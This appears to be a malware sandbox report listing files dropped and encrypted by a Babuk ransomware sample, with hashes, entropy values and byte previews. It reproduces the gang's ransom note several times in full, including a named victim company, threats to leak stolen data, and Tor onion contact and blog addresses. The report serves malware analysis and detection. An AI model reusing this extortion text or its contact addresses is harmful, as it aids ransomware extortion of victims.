                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8327314151039475
                                                                            Encrypted:false
                                                                            SSDEEP:24:X9pZ9dBx8qgOSjGTwR6Bn05ocG0WW5RxmBggfE84cZVO2Hozm:fZ9dBx8qYjc65obWLxmB48ZVO2Hozm
                                                                            MD5:2BD75428A725E13745204BB20C83D262
                                                                            SHA1:9C56D78F8BA31D2923243D561936AE94688FB00D
                                                                            SHA-256:A5935CB1EF22D04D5BDAF4A3517097649C2F383B30A3B727822DED8829FFDC19
                                                                            SHA-512:16071056F0C48CAFC1B6C88F161540360AF68E2BAE5F4DF20D4CB864DC587F327588D583951481CC94A2FB24934EC7B0D76C4115FCB29BC4A2E09D3C5749B26C
                                                                            Malicious:false
                                                                            Preview: .4MU..D......;..%9.._....E..;-.......;.....trQV..n..]..+.4.B..A.....6\.....#....Lp...f.....{&.@.1.....1qc.O...R.d.TZ..i..{.c$.ywVt..?4.a.1...Y....Qp.EE.c.o.s.--..P.N.*.....^.A.4...;^.R..58.....I..5..r..\..R8..L... .....}.{.2..n..\..f.Qy..S..`af+.Y.....!.S...!..8.Q.h2U.....5.....`Y....k0.I@....f..d..w.....a.N. .S.......-*....2~.jS]z.._F;.2}..A...JZ..j....t..!........7H...J.I.@..S..x.U.....sP.mB..^E...`'.DbJ..0Pu@..X.BX...g...F.O....Q....R...t...F.x....gP&.oc.......J..P.s{.b.].q.[=.:Q.M..z}.)..ky)....gcAG.>jC.....5Rzl.s...U.zM.{.@2...G.k.e.P...&...mb...~p.Ah.msn...&W.\4.\...#.R......G.~r..jFD........C_ug_B<."..:..V....pS.#..{.3....#...~.........8z.[-....AA..RI..wG..{G...........v..P|.0..@...ol~V..X."g...b+<.0..........hY..uoN\.c.!...7.......~.D0.a../.K..9..!.w...........u.]L...0yz..8Sy7w%.c.}j.T.3.b..$...z8.....#.........1t...0.8.Y.9.._.c..ty..z.2.....{.'`.Kcf)....xA..........tQ..Cp.......JP.C.*..C....4....v....&...0y...Z...C...uOm........2.+.S
                                                                            C:\Users\user\Desktop\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8335346455953125
                                                                            Encrypted:false
                                                                            SSDEEP:24:wwUVxLgmN4Nk7BiNLofAjIT2Q8aBkCtPobbgYiwg2Ka:ggzMBiVoiIT2uebp9g4
                                                                            MD5:ABC645DA2B1CF85E74C985B6836DEB4C
                                                                            SHA1:176B7EA2E70FD03E3101CCB7513DF24AD1F03523
                                                                            SHA-256:855F0C3525F341C9F0237B69E1FBFB73AEA08FF61E2125651CB96E8A1FC3D913
                                                                            SHA-512:28EC0FC95F6DCD1683991E287E94C15AE666DD1EBC0261637BE1F6197B4DE3F480414824BFAF581D37E1471991BB809419A1E0C75471A33A111DED0B310F1AE3
                                                                            Malicious:false
                                                                            Preview: .[^.].<5t.c"..(`f:W*wo...0](Ip.N..?f.)....J59c....@..#4..d.d.)B!6z..2O....XP..G..l.-.a....W9d.A...d.w.G....a.Q>...=.OI..1...;.E..t.../...y.H.e.J..[*.].l.I.m8/aYM.zP.....8.\....N.Cz..F.....L;.A.X..{VfOP..1.m.....!F....G...$..q....H.LH~...{.].LB..,.....O.XJ@U. .....z...G.+S.).(....e...)...Z..vc8..;......IX..8.f.Ny...!...b.w.U...............a..!.c.w .9......2'.."....dJG.mi.)..s.r.=.............Q........?#C......+.....}P..).d....v\}g.....6:. .(..Js.>1!.:...+3..B...l..D..wG.2y..Vj.|........cW..eSnx..8....SPw&...>;..g......HiT.FJE60|..0.>.n.=W|..4..~{.c..2MS).J9.\].1R...&%.S....-Q..&...~[..8.,.E.O....D5.,...{:K.R1..@.....t.H..q...............4[vR<idp3.`.....e.z<.4...Q=..^..nj;.>.\w=\b.?.$...T...ntr..z*.a.4.\'.#.....?...g.R.{..`n.*....8M.Z.$.6..X.....f.....k>*.....t..B.._.E.%.$N.n.C..C.`..K.VG...y.....Mt...@.gt.....6.#.1.......d..#...,..gbP.-Zpa..Z.......E.:,..."...osO..3h.~...lUA..J.W..+...P$k.F.j.&.ns.r..bLQ.@...v...{..9^...Q..{..2.-.j.
                                                                            C:\Users\user\Desktop\CURQNKVOIX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\Excel 2016.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2828
                                                                            Entropy (8bit):7.92600045278126
                                                                            Encrypted:false
                                                                            SSDEEP:48:myDAVocJkVRrlihbB7DJj3xc4waJhVX++eiEAi9/BjcMz+/7LTTCb5rM3+x2eze7:myD4TJk3rlmFDvbJhVX+tigmMi/7HTC0
                                                                            MD5:28B9D742860FB70CEBD2BE3A8422BA10
                                                                            SHA1:52CB7AF7CC32C4BBE1E8771019444D04EBECBFC9
                                                                            SHA-256:ABC9CC94EEB815B977F65E45B32220070AEFDF2D7806B365FBE9AC559C2F32AC
                                                                            SHA-512:C8BF6956A0D40378B5157E963913D814145699E4EA879F19D531BB612F3BA300B3D8C7A2B9C843059D05E857DEAE07157464F972087CA2DFE3E861A208DBC7E7
                                                                            Malicious:false
                                                                            Preview: ...c</.......8.qCkjF.D.mS...-{**zlg..tYc.)4/...C...e...!A}.7...;..a..Ys..P.a.l.LC........}*..X.!..g...8B...-%(.c../..6x.M.|. ..?^........e3.c..]..=.jy..e.U.@...B..B.L>......7....m..}..y.m%p.Z.n......K.E.2..i....;4z.n.z.P7.H.w?".G....v.......Ev...1>6n.h..B7D.'.%!....U..U.@_qh#..k...@O..P....?......wx..B--Qvf...u...o?.NEP..J...y..}..y..g.W v1%...1$..4.......k..1.....1.Xch.LvSM..N{b..M.$.?..br?l..1w.j.Os....d.$vZ..{r!.El.... *l|.....1H.2...].\'L.&f.......#....!g..e%.KG..=.......j.Y.<2..%.l...m}.."..E2.c....p..#Il.S.".{........Mc#.4....C....0..Nw....-.(..(2!.4...`%..N....9 ...m.$..{^Xr...{D.0.XO.#...a.........cZ^2C...m..X\l...edXe..C....H......&.........}6.....P.2.A.}....J`.p...y..Z.J*}.....F...v.>..C......@..&.f.gbD+:...Qw..t.ff....:|.+p..W..j.k[ksw..D.9.y.&S.L.9}..=...?4.Mx....+.F...,j...>.P...[A....q...LY...[.N./J!..S....Q.~... ..n.5.1..c.1.F8.......Q\L...A.`::.}.w..hf..G...B6!.....KK.....`.I.....y.o<p.vA..+.%e.....6...K.w........J..}./.B..
                                                                            C:\Users\user\Desktop\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.776904436735407
                                                                            Encrypted:false
                                                                            SSDEEP:24:6eqPn/gycgh96qsIbmdNi7jg/StM7mSRazhGJmSuqu7QMxO3aYm5ZYphD4Hw:6pPnDdCIEY7jgKtMBRQhGCqu8MWcgd4Q
                                                                            MD5:EDE64D8BB0267AA3D0C8AF7B9C334E87
                                                                            SHA1:89035AFF57A7D5CB037191E36742B3DF12E055E5
                                                                            SHA-256:F6446F989944A358EE6B37FCB753F4E8724517D880566ED85DA35FD7F0D7A25F
                                                                            SHA-512:362FF8BB8DE426AB035868F1A9BBC6DE16FD1FD17AACF2541DCA3906C77047ECF2ED57F6972D8BFBB7C60BA663F4737EC066FB441117FBF0332E1D5328B1030E
                                                                            Malicious:false
                                                                            Preview: .....o....hLA.(.3.11h.o1.Xsk\.CK.N.....x..R}g..F.dBC.zu.9..?..?G.ls...l.....&..Fr^..K..xw..M.`."a.C@...$..`Dv..1..x=78...4.g.%P..j...a.c...7.H.0...w.x.9...k.v.%.............._r...v.g.....N....:]...2.N..;U....$:.#...........T..O.P.....p.........Wx[I..g...........9na..'...T.[zpq.gV..V."3......(M-.^.l..s.i...+.p{...H.....K..r[..W.7..O...HB.4..3`.. ......../F.kiTe....U..hp..w}+m...t....(? ..V].?e.V.. .[..Y...."f..S..o.!8_`.v....gT.K.S..7...6.J7.......V...#.........7.$.L....7m}p..Xbl....]..1=.T.o:r..#.3...-...9.c.]......'L.gJ.`......P1u.q...X...xK.....G|....>.m.......M...[.d|^.<.w.._....v...x...h........?.........d....l.#......R.T.b\c2..UHPm..'..[.xE.f....WF.....t...2u..Gc....Q..*&..sA;i.Z.1$..........m.e}.*..t`E..2N..Jsu.......(.....o<...._.{..j..|}.o.=....C......F..#.heca..!j[.k2_.5..D..H.p..a..,..@Ov.{....g@.4....xP...9.3f."..u.Ixv...:.c......a.VS.}h.zL.Z..]..J1r.u^v.....I._#.b8I%..]..]n......G.W..u..7G..N..gSTf.~..S..?...mo..w......
                                                                            C:\Users\user\Desktop\FENIVHOIKN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836840719095412
                                                                            Encrypted:false
                                                                            SSDEEP:24:7SqdQecFyStbEgFMOGDSMhoI20WW8nTxPiYnSagTycL80:OqdjcFy3gFM9fHyTJxjwN80
                                                                            MD5:32FDCB0549893A408314A43055493139
                                                                            SHA1:87572C5152FA10DE18AFC258540D32BAF8E65830
                                                                            SHA-256:BEFEE27F78EF926A13873659B22F2AF1B6BBFB8E00860B78E8D72CCBDAEFB8B4
                                                                            SHA-512:5D0515BC39EFA301332083273FCB7C30C738E4B9681E0FF3D3BDFF7FDF174C95E33390EFB722C72BB1EAEDB40B491FD6A0793319A09E6E0743773D35451E0136
                                                                            Malicious:false
                                                                            Preview: WT.<..y...8..~.M.$"y~.9.w.[..J4p...=V..*.I.P.....L..G2Y.z..L...a..5K.W....Yv ..E\.......6H.oJ@....O..0m...J.Q^..2 .>3;.xg.+Y...l...*.-0H..7d.r..?.K.U....%.J..>D..Y.X.r..tME....9..../.F.dh.*....$.. ?... x.M.c.80.nH....&_|A.0..k....m.J1H.....Y6.#.Tg4$G...#@.3..Jx...u&.....h...0.....n<...f...]....=..x..XP.\.&i.......^.:e....*8.DY.....T!..}.'..[.T.......{.P.pg.......[.#.3..7...r...X...l.T..g.....#..........Y.m.)..G.r\8.4;-sJx..x....^E.......x.+...37.!......4....s~`...........=Og.......y.t..`.sGw.D.9U0.A..j..+L..Z...v..Zbd.kc.R...u.._*V...}.A....:W....:.?..M.<vZ.0.@8.;..[h.......+...j.....YX...6y.dY2..@..Oy.x.%..U.v5....|.......r.........-.)J..9.LVb....V.Hp..Q.;...>.B.f.V.h.,...f....K/..o...:}......LkrE7.....A9>dx...c..K.3.$...6......Qs#...e.n...;.].m<.uK.MRyz.?..q.:.(.l..>K.....).{....d"..U...#.Oq..;.k...~u.l..._....F<...R....E..h.a..xk..K..!....'.L..UG0..J.,*......H..`.VUB.S...0M\..t.>h_.\.....Ck6.%........c....{GZt.(Z...{..<..Nk.......
                                                                            C:\Users\user\Desktop\IPKGELNTQY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827760283499267
                                                                            Encrypted:false
                                                                            SSDEEP:24:iq9yn/UviIyjhhbYQVr8vW8VXGI0xaGkaERdL9T+FZxIQztowMq:1USihHMJV2I0tkj7YHDowz
                                                                            MD5:4CBCFD5666F7BBD6840D4893AF3A6F7C
                                                                            SHA1:59631295599A5B2BA25CB5D55E378A80D265BDCC
                                                                            SHA-256:031A0213E0861811AADE223931D6157CE8FD00A05C50FADEB398F0A65F7D9189
                                                                            SHA-512:87EBA39D78B3D6352D9D46508FA318B72EBD0A708DBD2950CC1D2FDCDC6F716E39B2AA63C9B0B90D5BD6D5E11DF50FD5343BE4D7F1467D41A5AFFC1C99E66C6E
                                                                            Malicious:false
                                                                            Preview: v.6.+..............8?....UE.lwu.>....e..i]&...(X..=...A.zf.'...E..(o...&...0..-....m/t...5c g.\...;...>.O.pF.'...&.>8.a..6....ky.z....t.).'...[+J.v.../s...=.k.....J..............R|.8./..s..ZI..0\C..(...o..}0.L..I.I.....ge.....7/.1.@.am-...h'..<..T!...o.Q...M...Q......'O...E.n...0v?...7.........'..4&r...m...-[..\EY.N@.5..y.\..........,5X.O<.3S.<l.....WU%'...;...k..E........2.....].....-..0.m}3..m%...E..m.C/......|=...-...j.b.X%.6..dx.d.6......#..+.K(C.aS.*]........2..=.)..o......<...._O.A...,.5.....W..N..}..5..1.....Is.3.E |.h3..\.c8....,~.n.._..87...........kn.....O..G....|.'.tZ..a.S....<9.=.....o*_<X`.......E*.....z......v.[.p....9........pq..bEey!#.....L...]..I.......Et....i.n...i...K..~...o%....uN..m...f).,.:..#^.y.......HR...^c..q..z..._.?....lSJf...E.ul...eX.pSE?i....+..Z.Ka.-&i.3z.&.?....urp.2a3.Bx@J....RDNb5...NR...0....|..]&Y.ff....~.B.X....4x..UR..%.:.....cf.....u..t......~:..q?...xa..G.f..........._..z..p.....52I.....
                                                                            C:\Users\user\Desktop\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.859989296638824
                                                                            Encrypted:false
                                                                            SSDEEP:24:SyiAj5PJUl+dkBfyj9N2I2RwZ4VRAGWq1caLAHTWnswk8t4HF:5t2Bfyj9BZ4VRAFecaATgj4HF
                                                                            MD5:3EB598406E8CEE443D0BDD374FB46894
                                                                            SHA1:5D6A87AD01A754D56161452CCAB731731B0B8705
                                                                            SHA-256:5625DD2541FB8FE21717333B19503CBED254AAD8C9BA73DC8FBEAC285183E8B9
                                                                            SHA-512:4D4DD5507520B58D007F19725227F0B8A4B3B6D63CD95A947837C2BD364EB50B316DB777ACF41444FC479C3423F0F6B40084AA5B58106A70CB050F209EA5CA05
                                                                            Malicious:false
                                                                            Preview: .%=.]. .8?.../u.r..j......+....<p. ._.N.l...~].8w^..<NPR...vc...9...*..n.Z.+....:.}./ ..'v...'..im..}n(.....g.?...:(.&I.2..3.u.C.....-..\..@_8...rC.........<.t.P=.;...[yh^ebQ..7...Eq....Y.....v}.'..b.._....4e..5...7......A7..F.fS^N.@Y..dF.3q..Y......\B..-T....._S*..%.o..}...B.".(.Z..ak.q..{*.....Z3k.y..4...b$y.*..(..zC.... 8C...+..Q^.....T/.s@....n5..?..d.....B..PO.N.C.rA.z.G..............~..-.|..*n..3g.....U.%.a..?.(A....!...X.D...`...yX..(..SZ..,-..L.......H.?t.....T1.......@..^..c=uz.=8.f.4(nJ.1........i.F.x.Gt....II.....+W...t2QLT.uu.8.VV..M.Y..Z.]...S...p/V....\...&x..6.>b;.0.%..xj.M.P.....E5.(.-........z.D...]*..o].z.5.....'_um.e..~.:P.46..{`7...G...5.`T..@./C.%.......x...D...W.f!.`.YX.c.c3m_M......2m.n.o.P.wT...7...m...."......`4.8....7.m.E.w.hh.*hVL..#..Tq..vI\K..U..5^{.D1_`O..T.........:.L..O....J..T)..I .P.^.I.U"......M I..^..\.|...k..v..8..w.N.a9...m<e..?cU...#.p&._.w......US.22.VT.~P.>S.>....~.J....k.....&.W .......3[.....
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8257216355769
                                                                            Encrypted:false
                                                                            SSDEEP:24:hFzBjJHe1AULdRZ+mWr02hqk2NxTJHs1bQ/B5f2P4LYdx:hD9H8AULd/nEbL2NxTp3FPLcx
                                                                            MD5:204CC32756D2DA16BC0349001D3C6F29
                                                                            SHA1:871BBE5807D9FB0B56DF76DAF911107AC528DD97
                                                                            SHA-256:4B4A6E10783503EA6877E2D843ACD361AA88C040A714ADED5C5E8FFA568FB17E
                                                                            SHA-512:56DDCD58260F0A68BE385CA8AA08DB2BCFB5B44E839C3D53F4FFF446233B4953AC32C256A87E449C9F4A640CE9848C84E6523C1FCFF89A36B69E9616F6E392ED
                                                                            Malicious:false
                                                                            Preview: .f.....z)......?...R.-.......Oze.....p"F.R.%..F\%X_.n...z.5.Q../.k.j.g.W..f\.G`...X.o.z.?...k...2..$Lr...j~........9..?....1IoT....:.R)...*....I.c+.{..M......3...!{...B~<.M...e.......>+.h.n.a.2....+..+....]..)v.z..^:.]..X....KF....._uL8!e...C.R..L._.$J\~.._...........C9....m.C......|..F...j..'F.x.B.#z.6m.m.VH(../fg.S.s.Gj..9d.@?ESj..%]<..-....O.......|..t...^...Qo.?..5..).!.5..8..Q....*J..P.JN.HO...:Z.Y........@.u.>...oM[.`...Q...EC..}........eU..o....e<h}...h.E....Y.......`ZW...h&.F...f{....!}D..J.J..;S..>....5.J...WT?$G.....s!.!W...w~F,..a.E\.Et..T..N..T....1.H..A&..@..^..=.'.....w(..&.....9....w.......R..'.&\z..X.W._...a..........6[..h...wT..=}....._.29|.a..K4..Ilm.6.2u.u.2....z....R.....z......:L^B.f..s*D.U..4.716.E#..}.. ."...-:.ZWl...E.r.m.... .].y...|...r.{\PV}....X..-...6.l0...:R...T.F..o......V......q.G.....R.p.o,..j....\.;m.$2A.....A.g.K..c|b...a......S. =T."..Q...Itd.e,.../..Re...Q5.{;..Iz6..^..S........E....2...g..>...
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805570173522477
                                                                            Encrypted:false
                                                                            SSDEEP:24:/FOiS03wDysnrTDAbbuAkhOy9AurWsme1T5nYHdH1YXnzMZXWnywhVEhY:wSs5DAbfoOijwVYoVgyQVsY
                                                                            MD5:EC683215A882B43C6F4A52FD71F18677
                                                                            SHA1:DFF82A5F057C42AB9178B9C05A8B8F6106FD956C
                                                                            SHA-256:E7E02751D46F99C6DA8893E62886BED1B9985C5829F0A241660F56039C8E3E46
                                                                            SHA-512:DF9EAA89877AF7BEA46397A68B54C91AFBC27F2F8471F83FB54FADDCCFC4B8842FA6C77AE5A664829A7F3274AF3C49AEDC1684B7A5BC873592F32619769F7642
                                                                            Malicious:false
                                                                            Preview: ...(."4....u(.."'\j /..v....YX..n....n.RhR..z. [....2....'.....y.}....].Z.zy....._S.KQ26.........1.../..@4..qr.......9|....'..."#.m.T..@m..Yl..yB*..,Uw!^.l.oo.....NL4..'..?.T.h..E.6....../JKg2..=w.f*Y...<.^V.`.v..Q.)Qe...y...B..\[!.._.........u.Z..15.a%..m.w.,b.k.(%1...n$.".4\.%2.)%.!.$...B+$...x..#%n..o..@.k...|..fT.:.c......~...O0..O$.!..........g..."-#.`...0c.V.v0(..PV...r......P"?5....x5i...M.s[..o...5.f\.f...c%.xKd....D...<*.....4D...]o.!u...]R..a.......y..(.g....F..+.......<..?.....].)......Tal.....0!...._..;[...{F._...."b.....<.:M,.]u..m.......SC(V.!..hh.@.m.......W..us2....2!...,.9.....s...&........+.Aid|h9..j...W.g.1.L.2..().....].r...W.bF...Be.'....w(..fE9..!...AT ...k......J..T.?.!.....m....<...H5...L.....B...u.j......,FD.....>XXM..%. .}[db..>...4..z..Q..C ..@..2.k:..F;........M.7.>%\.}...ro.x.C.1....IrB,QT.5G.>..].4.U=..E^/c...0e../.[.I"X..H..N..G..O.?..L......i@N4...x'i<7*._O...m../X..8.8...T.!r..4X{6.9.B.X.k{4../*....
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.803851003064965
                                                                            Encrypted:false
                                                                            SSDEEP:24:XBSm1WMVGNYJ0nB92dZwl0fPDLV0p3t+tAWa/CnwbL1V:XBLGDzlQ+pd++IiL1V
